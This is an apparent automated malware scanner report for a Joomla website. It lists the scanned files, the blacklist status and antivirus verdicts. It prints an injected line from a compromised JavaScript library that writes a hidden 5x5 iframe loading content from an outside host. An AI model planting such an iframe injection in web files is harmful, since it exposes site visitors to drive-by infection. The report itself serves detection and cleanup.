New scan:

Malware Scanner report for keala-pono.com

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "keala-pono.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/2/2
2 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=keala-pono.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://keala-pono.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.keala-pono.com/
200 OK
Content-Length: 17102
Content-Type: text/html
clean
http://www.keala-pono.com/media/system/js/modal.js
200 OK
Content-Length: 10588
Content-Type: application/x-javascript
clean
http://www.keala-pono.com/components/com_k2/js/k2.js
200 OK
Content-Length: 3083
Content-Type: application/x-javascript
clean
http://www.keala-pono.com/media/system/js/caption.js
200 OK
Content-Length: 1963
Content-Type: application/x-javascript
clean
http://www.keala-pono.com/plugins/system/rokbox/rokbox.js
200 OK
Content-Length: 22076
Content-Type: application/x-javascript
clean
http://www.keala-pono.com/plugins/system/rokbox/themes/light/rokbox-config.js
200 OK
Content-Length: 2597
Content-Type: application/x-javascript
clean
http://www.keala-pono.com/cache/js-20add7356fb1769605730f0e6ae697f3.php
200 OK
Content-Length: 6273
Content-Type: application/x-javascript
clean
http://www.keala-pono.com/modules/mod_rokajaxsearch/js/rokajaxsearch.js
200 OK
Content-Length: 15836
Content-Type: application/x-javascript
clean
http://www.keala-pono.com/index.php?option=com_content&view=article&id=64&Itemid=166
200 OK
Content-Length: 13676
Content-Type: text/html
clean
http://www.keala-pono.com/index.php?option=com_content&view=article&id=119&Itemid=170
200 OK
Content-Length: 26824
Content-Type: text/html
clean
http://www.keala-pono.com/index.php?option=com_phocadownload&view=section&id=1&Itemid=167
200 OK
Content-Length: 11983
Content-Type: text/html
clean
http://www.keala-pono.com/index.php?option=com_exposeprive&Itemid=169
200 OK
Content-Length: 15832
Content-Type: text/html
clean
http://www.keala-pono.com/components/com_exposeprive/expose/swf/AC_RunActiveContent.js
200 OK
Content-Length: 3359
Content-Type: application/x-javascript
clean
http://www.keala-pono.com/components/com_exposeprive/expose/shadowbox/build/js/lib/yui-utilities.js
200 OK
Content-Length: 43404
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

if(typeof YAHOO=="undefined"||!YAHOO){var YAHOO={};}YAHOO.namespace=function(){var A=arguments,E=null,C,B,D;for(C=0;C<A.length;C=C+1){D=A[C].split(".");E=YAHOO;for(B=(D[0]=="YAHOO")?1:0;B<D.length;B=B+1){E[D[B]]=E[D[B]]||{};E=E[D[B]];}}return E;};YAHOO.log=function(D,A,C){var B=YAHOO.widget.Logger;if(B&&B.log){return B.log(D,A,C);}else{return false;}};YAHOO.register=function(A,E,D){var I=YAHOO.env.modules;if(!I[A]){I[A]={versions:[],builds:[]};}var B=I[A],H=D.version,G=D.build,F=YA
... 3062 bytes are skipped ...
="scroll"){F=[E.scrollLeft,E.scrollTop];}else{F=C.getAttribute.call(this,D);}return F;};A.setAttribute=function(D,G,F){var E=this.getEl();if(D=="scroll"){E.scrollLeft=G[0];E.scrollTop=G[1];}else{C.setAttribute.call(this,D,G,F);}};})();YAHOO.register("animation",YAHOO.util.Anim,{version:"2.4.1",build:"742"});
;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
Sophos
Mal/Iframe-AN
GData
HTML:Iframe-inf

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://www.keala-pono.com/components/com_exposeprive/expose/shadowbox/build/js/adapter/shadowbox-yui.js
200 OK
Content-Length: 1063
Content-Type: application/x-javascript
suspicious
Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: keala-pono.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: keala-pono.com
Referer: http://www.google.com/search?q=keala-pono.com

Result:
The result is similar to the first query. There are no suspicious redirects found.